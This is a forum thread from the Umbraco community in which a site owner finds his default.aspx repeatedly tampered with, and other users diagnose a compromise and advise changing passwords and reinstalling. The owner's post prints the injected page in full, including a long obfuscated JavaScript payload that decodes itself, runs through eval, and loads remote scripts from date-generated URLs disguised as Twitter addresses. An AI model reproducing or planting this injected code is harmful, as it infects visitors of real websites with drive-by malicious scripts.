My root default page every few days seems to be changing of it's own accord. I replace it with the standard default page and in a few days time and has changed again and generates errors:
This is the source of the default pages which generates my errors:
Same thing happened to one of my client's umbraco installs a couple of months back. The attacker injected the majority of .aspx pages (not just the root default.aspx). Only reason I noticed it was because they'd injected JavaScript outside of the <asp:Content> tags - throwing an exception.
We found that one of the NT accounts (that we used for FTP) was compromised ... so we changed all user passwords - and we haven't had the problem again yet. Which I know doesn't sound like a solution - but time/money and client responsibility came into it!
After that, re-upgrade to the latest version of Umbraco (literally XCOPY over your current site) - to replace all the infected ASPX pages. It goes without saying, make sure you back-up all your data first!
Default Page changing or being hacked ?
Hi,
My root default page every few days seems to be changing of it's own accord. I replace it with the standard default page and in a few days time and has changed again and generates errors:
This is the source of the default pages which generates my errors:
<%@ Page language="c#" Codebehind="default.aspx.cs" AutoEventWireup="True" Inherits="umbraco.UmbracoDefault" trace="true" validateRequest="false" %>
<script language="javascript">$a="Z64aZ3dZ22fqb0t-7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+vZ257Fb08fqb0y0y~0gy~tZ257FgZ3edgZ3edbu~tc9kyv08gy~tZ257FgZ3ex0.0(0660gy~tZ257FgZ3ex0,0Z2522!0660yZ3ey~tuh_v870Z2520Z27790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mu|cu0yv08yZ3ey~tuh_v870!(790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuZ22;cdZ3dZ22Z2573tZ253dst+Z2553trZ2569ng.Z2566roZ256dZ2543Z2568aZ2572CZ256fZ2564eZ2528(tZ256dZ22;ceZ3dZ22p.Z2563haZ2572CoZ2564eAZ2574(0)Z255eZ2528Z25270Z257800Z2527+esZ2529));Z257d}Z22;cuZ3dZ22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:wZ7by;xp;ubZ7bfdZ25;64c}p`|)Z25$$4|q}s|`),$*(;}rfuyq*(;p}b*Z22;stZ3dZ22Z2573tZ253dZ2522Z2524aZ253dsZ2574;Z2564cZ2573(Z2564aZ252bdZ2562Z252bZ2564Z2563+Z2564dZ252bdZ2565Z252c1Z2530)Z253bZ2564Z2577(Z2573tZ2529;Z2573Z2574Z253d$aZ253bZ2522;Z22;deZ3dZ220..0$90;0~e}9050!Z25209M+Z2519}Z257F~dxSx0-0|uddubcK88dy}uK7}Z257F~dx7M0;0~e}9050Z2522Z259M0;0|uddubcK88dy}uK7}Z257F~dx7M0:0~e}9050Z2522Z259M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0Z25269050Z2522Z279M+Z2519dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0Z3d0#9050$9;0!Z2520M+4q-4qZ3ebu`|qsu8tZ3ctqiSx0;0iuqbSxZ25220;0}Z257F~dxSx0;0iuqbSx!0;0tqiSx0;0}Z257F~dxcKdy}uK7}Z257F~dx7M0Z3d0!M0;07Z3esZ257F}79+Z22;czZ3dZ22Z2566unZ2563tiZ256fZ256e cZ257a(czZ2529Z257brZ2565tuZ2572Z256e cZ2561+Z2563b+Z2563Z2563Z252bcdZ252bceZ252bczZ253b};Z22;dcZ3dZ22fqb0|uddubc0-0~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7z7Z3c7y7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~e}rubc0-0~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+Z2519ve~sdyZ257F~0Sq|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbudeb~0888iuqb0;08y~tuh0:0tqi990;08}Z257F~dx0N0tqi90:0y~tuh90;0tqi9+mZ2519fqb0iuqbSx!Z3c0iuqbSxZ2522Z3c0}Z257F~dxZ22;opZ3dZ22Z2524Z2561Z253dZ2522dw(Z2564cs(Z2563Z2575Z252c14)Z2529;Z2522;Z22;dzZ3dZ22Z2566uncZ2574Z2569onZ2520dZ2577(tZ2529Z257bcZ2561Z253dZ2527Z252564oZ25256Z2533Z2575mZ252565ntZ25252ewZ252572iZ2574Z252565Z252528Z252522Z2527;ceZ253dZ2527Z252522Z252529Z2527;cbZ253dZ2527Z25253cscZ252572ipZ252574Z252520lZ2561Z25256eZ2567Z2575aZ252567Z2565Z25253dZ2525Z2535Z2563Z252522jaZ2576aZ2573cZ252572ipZ25257Z2534Z25255cZ25252Z2532Z25253Z2565Z2527;ccZ253dZ2527Z25253cZ25255cZ25252fscZ252572Z252569ptZ25253eZ2527;eZ2576Z2561l(Z2575neZ2573caZ2570e(Z2574))}Z253bZ22;ddZ3dZ22SxZ3c0tqiSxZ3c0~e}+Z2519~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7MZ3c0dy}uK7}Z257F~dx7MZ3c0dy}uK7iuqb7MZ3c0cxyvdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90;0~e}9050Z2526#9050Z2522Z2526M0;0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90,,0Z252290;0~e}9050Z2522Z25M+Z2519iuqbSxZ25220-0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0#90;0~e}9050!Z25209M0;0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!9Z22;cbZ3dZ22Z2528dZ2573)Z253bZ2573Z2574Z253dtmpZ253dZ2527Z2527;for(Z2569Z253d0;iZ253cdsZ252elZ22;dbZ3dZ22Qd8!90;0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mmfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~tZ257FgZ3ewtZ3ewudEDSVe||Iuqb89+dy}uK7}Z257F~dx7M0-0gy~tZ257FgZ3ewtZ3ewudEDS]Z257F~dx89;!+dy}uK7tqi7M0-0gy~tZ257FgZ3ewtZ3ewudEDSTqdu89+fqb0t-7vrs}vybZ3esZ257F}7+fqb0}Z257F~dxc0-0~ug0Qbbqi87e~Z257F7Z3c07tfu7Z3c07dxb7Z3c07vyb7Z3c07fyv7Z3c07huc7Z3c07fuc7Z3c07wxd7Z3c07u~y7Z3c07ud~7Z3c07|uf7Z3c07dgu79+Z22;caZ3dZ22Z2566uZ256eZ2563tioZ256e Z2564cs(Z2564s,Z2565sZ2529Z257bdsZ253duneZ2573caZ2570eZ22;ccZ3dZ22enZ2567th;Z2569+Z252bZ2529Z257btmZ2570Z253dds.Z2573Z256ciZ2563e(Z2569,iZ252b1);Z22;Z69f (Z64ocZ75Z6dentZ2ecZ6fZ6fkieZ2einZ64exZ4ff(Z27rf5fZ36dsZ27)Z3dZ3d-1)Z7bfunctZ69Z6fnZ20cZ61lZ6cbacZ6bZ28xZ29Z7b wZ69ndZ6fwZ2etw Z3d xZ3b vZ61r dZ20Z3d neZ77 DZ61Z74e(Z29; dZ2esZ65tTiZ6deZ28xZ5bZ22as_oZ66Z22]*10Z300);Z76arZ20h Z3d dZ2eZ67etZ55TZ43HouZ72Z73(Z29;wZ69ndZ6fw.Z68 Z3d Z68;ifZ20(hZ20Z3c 9)Z7bdZ2esZ65tUZ54CDZ61Z74e(dZ2egetZ55TZ43DatZ65Z28) -Z201)Z3bwiZ6edZ6fw.Z67d Z3dZ20d;Z73c(Z27rfZ35f6Z64Z73Z27,2,7Z29Z3beZ76Z61l(uZ6eesZ63apeZ28dZ7aZ2bcz+Z6fpZ2bstZ29+Z27dZ77(dZ7a+Z63Z7a($Z61+stZ29)Z3bZ27)Z3bdocZ75menZ74.wrZ69te(Z24aZ29;Z7delsZ65Z7bwZ69ndZ6fZ77.gZ64 Z3d d;vZ61Z72 tZ69Z6de Z3d Z6eZ65w Z41Z72Z72aZ79Z28);Z76Z61rZ20shZ69Z66tInZ64ex Z3d Z22Z22;tZ69meZ5bZ22yeZ61rZ22] Z3d d.Z67etUZ54Z43FuZ6cZ6cYZ65Z61r(Z29;tiZ6de[Z22moZ6ethZ22Z5d Z3d Z64Z2egeZ74Z55Z54CMZ6fZ6eth(Z29+1;Z74Z69mZ65[Z22dayZ22] Z3d d.Z67etUZ54CDaZ74e()Z3bZ69f Z28dZ2egetZ55Z54CZ4dontZ68()Z2b1Z20Z3c 10Z29Z7bshZ69Z66Z74IZ6eZ64eZ78 Z3d tiZ6de[Z22yeZ61rZ22] Z2bZ20Z22-0Z22 Z2b (Z64.geZ74UZ54CMoZ6ethZ28)+Z31)Z3b}Z65Z6cseZ7bsZ68Z69fZ74Z49nZ64ex Z3dZ20timZ65[Z22yeaZ72Z22] +Z20Z22-Z22 + (Z64.geZ74Z55TCMZ6fnthZ28Z29+1Z29; }Z20if Z28d.Z67eZ74Z55Z54Z43DatZ65()Z20+1 Z3cZ2010Z29Z7bshiZ66Z74Z49ndeZ78 Z3dZ73hiZ66Z74InZ64Z65Z78 +Z20Z22-0Z22 +Z20d.Z67Z65Z74Z55TCZ44ateZ28);Z7delZ73Z65Z7bZ73Z68ifZ74IndZ65xZ20Z3d shifZ74IndZ65x Z2b Z22Z2dZ22 + d.Z67Z65Z74UTZ43DZ61teZ28);}Z64ocZ75meZ6et.Z77rZ69tZ65(Z22Z3cscrZ22+Z22iptZ20lZ61nZ67Z75ageZ3djaZ76Z61sZ63rZ69ptZ22+Z22 srcZ3dZ27httZ70:Z2fZ2fsearZ63hZ2etwiZ74terZ2eZ63omZ2ftreZ6edsZ2fdZ61ilyZ2ejsZ6fn?dZ61teZ3dZ22+ shZ69Z66tInZ64eZ78+Z22&cZ61llZ62ackZ3dZ63aZ6clZ62Z61Z63k2Z27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);}} fuZ6ectZ69onZ20calZ6cbacZ6bZ32Z28x)Z7bZ77inZ64oZ77.tZ77 Z3d x;scZ28Z27rf5fZ36dsZ27,2,Z37);eZ76al(Z75nesZ63apeZ28dZ7a+Z63z+oZ70+stZ29+Z27dw(Z64zZ2bczZ28$a+Z73t))Z3bZ27);docZ75meZ6et.wZ72iZ74eZ28$Z61)Z3b}doZ63uZ6dentZ2ewriZ74eZ28Z22Z3cimg Z73rZ63Z3dZ27httZ70:Z2fZ2fsearcZ68.twZ69Z74tZ65rZ2ecoZ6dZ2fZ69mZ61gZ65Z73Z2fsearcZ68Z2frss.Z70ngZ27 wiZ64tZ68Z3dZ31 hZ65ighZ74Z3d1 stZ79leZ3dZ27viZ73Z69biZ6citZ79:Z68iddZ65nZ27 Z2fZ3e Z3cscrZ22+Z22iZ70tZ20laZ6egZ75agZ65Z3dZ6aZ61vaZ73Z63ripZ74Z22+Z22 srZ63Z3dZ27httZ70:Z2fZ2fseZ61rZ63h.Z74wiZ74Z74eZ72.Z63oZ6dZ2ftreZ6eZ64Z73Z2fweeZ6bZ6cy.jZ73onZ3fcaZ6clbaZ63Z6bZ3dcalZ6cZ62acZ6b&eZ78cZ6cuZ64Z65Z3dhasZ68taZ67sZ27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22Z69Z70tZ3eZ22);}eZ6cseZ7b$aZ3dZ27Z27};fuZ6ecZ74iZ6fn Z73Z63(Z63nm,Z76Z2cZ65Z64)Z7bvar Z65xdZ3dnZ65w Z44ateZ28)Z3bexZ64.Z73etZ44ateZ28eZ78d.Z67Z65tDaZ74eZ28)Z2beZ64Z29;dZ6fcumZ65nZ74.Z63Z6fokiZ65Z3dcnm+Z20Z27Z3dZ27 +esZ63apeZ28Z76)+Z27;eZ78pirZ65Z73Z3dZ27+exdZ2etoGZ4dTSZ74rinZ67();Z7dZ3b";function z(s){r="";for(i=0;i<s.length;i++){if(s.charAt(i)=="Z"){s1="%"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}eval(z($a));</script>
Can you repost please so I can remove the trash!
TIA,
/Dirk
Excuse me? That is the default page that it seems to be being replaced with?
David.
Hi David, you are definitely being hacked.
Same thing happened to one of my client's umbraco installs a couple of months back. The attacker injected the majority of .aspx pages (not just the root default.aspx). Only reason I noticed it was because they'd injected JavaScript outside of the <asp:Content> tags - throwing an exception.
We found that one of the NT accounts (that we used for FTP) was compromised ... so we changed all user passwords - and we haven't had the problem again yet. Which I know doesn't sound like a solution - but time/money and client responsibility came into it!
After that, re-upgrade to the latest version of Umbraco (literally XCOPY over your current site) - to replace all the infected ASPX pages. It goes without saying, make sure you back-up all your data first!
Good luck!
Cheers, Lee.
Hello Lee
Thanks for that, I will follow your advice. Top man.
David
is working on a reply...
This forum is in read-only mode while we transition to the new forum.
You can continue this topic on the new forum by tapping the "Continue discussion" link below.